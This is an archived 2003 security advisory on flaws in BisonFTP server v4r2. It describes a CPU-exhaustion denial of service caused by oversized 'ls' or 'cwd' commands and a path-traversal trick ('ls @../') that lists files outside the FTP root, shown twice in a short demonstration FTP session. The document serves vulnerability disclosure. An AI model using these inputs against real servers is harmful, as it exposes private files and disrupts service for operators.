Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
|
|
|
|
|
|
|
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
|
|
|
|
Become a Partner and License Our Database or Notification Service
|
|
|
|
|
|
|
|
|
|
|
|
|
BisonFTP Server Discloses Information to Remote Users and Lets Remote Users Deny Service
|
|
SecurityTracker Alert ID: 1006116 |
|
SecurityTracker URL: http://securitytracker.com/id/1006116
|
|
CVE Reference:
GENERIC-MAP-NOMATCH
(Links to External Site)
|
Date: Feb 17 2003
|
Impact:
Denial of service via network, Disclosure of system information, Disclosure of user information
|
Exploit Included: Yes
|
Version(s): v4r2
|
Description:
Immune (www.immune.dk) issued an advisory warning of vulnerabilities in BisonFTP. A remote user can obtain information about files located outside of the FTP root directory. A remote user can also cause denial of service conditions.
It is reported that a remote authenticated user, including an anonymous user, can send an FTP command with a large amount of data to cause the BisonFTP server CPU usage to reach 100%. This condition will persist until the remote user closes the socket. An 'ls' or 'cwd' command with 4300 bytes or more can trigger this flaw.
A remote authenticated user can obtain directory information for files located outside of the FTP root directory. A demonstration exploit transcript is provided:
ftp> ls @../
227 Entering PASV Mode (10,10,10,10,4,126)
150 Directory List Follows
-rwxrwxrwx 1 user group 739577 Feb 05 2002 BisonFTP42.exe
226 Listing complete.
ftp> mget @../Biso
local: BisonFTP42.exe remote: BisonFTP42.exe
227 Entering PASV Mode (10,10,10,10,4,128)
550 File does not exist
ftp>
|
Impact:
A remote user can view directory listing information for files located outside of the FTP document directory. A remote user can cause CPU utilization to reach 100% on the target server.
|
Solution:
No solution was available at the time of this entry. At the time of this entry, the vendor's web site was not available and was listed as "under construction."
|
Vendor URL: www.bisonftp.com/ (Links to External Site)
|
Cause:
Exception handling error, Input validation error
|
Underlying OS:
Windows (Any)
|
|
Message History:
None.
|
Source Message Contents
|
Date: Mon, 17 Feb 2003 13:16:17 +0100
Subject: [immune advisory] Mulitple vulnerabilities found in BisonFTP
|
[immune advisory] Mulitple vulnerabilities found in BisonFTP
================================================================================
BisonFTP is a FTP daemon used on Microsoft Windows 9x/NT systems.
-[ DESCRIPTION ]----------------------------------------------------------------
I) BisonFTP is vulnerable to a DoS attack by sending ftp commands with big
data. By sending the ftp command ls or cwd with 4300 bytes or more,
BisonFTP will start 100% CPU usage until the socket is closed by the client.
II) It's possible to trick BisonFTP into revealing confidiential information
about files outside ftp root.
ftp> ls @../
227 Entering PASV Mode (10,10,10,10,4,126)
150 Directory List Follows
-rwxrwxrwx 1 user group 739577 Feb 05 2002 BisonFTP42.exe
226 Listing complete.
ftp> mget @../Biso
local: BisonFTP42.exe remote: BisonFTP42.exe
227 Entering PASV Mode (10,10,10,10,4,128)
550 File does not exist
ftp>
% Note that BisonFTP42.exe is NOT located in ftp root.
-[ AFFECTED VERSIONS ]----------------------------------------------------------
BisonFTP v4r2.
* Earlier versions are not tested.
-[ SOLUTION/WORKAROUND ]--------------------------------------------------------
It's not possible to get in contact with the people at http://www.bisonftp.com
anymore. I guess a new version will never be released.
Workaround, since there might not be a new version you probaly better to
install another FTP daemon.
-[ CREDIT ]---------------------------------------------------------------------
Bugs found: 15/jan 2003, by Jimmi Andersen
Vendor contacted: 11/feb 2003
Made public: 17/feb 2003
http://www.immune.dk | Immune - Angreb og forsvar af systemer
|
|
Go to the Top of This SecurityTracker Archive Page
|
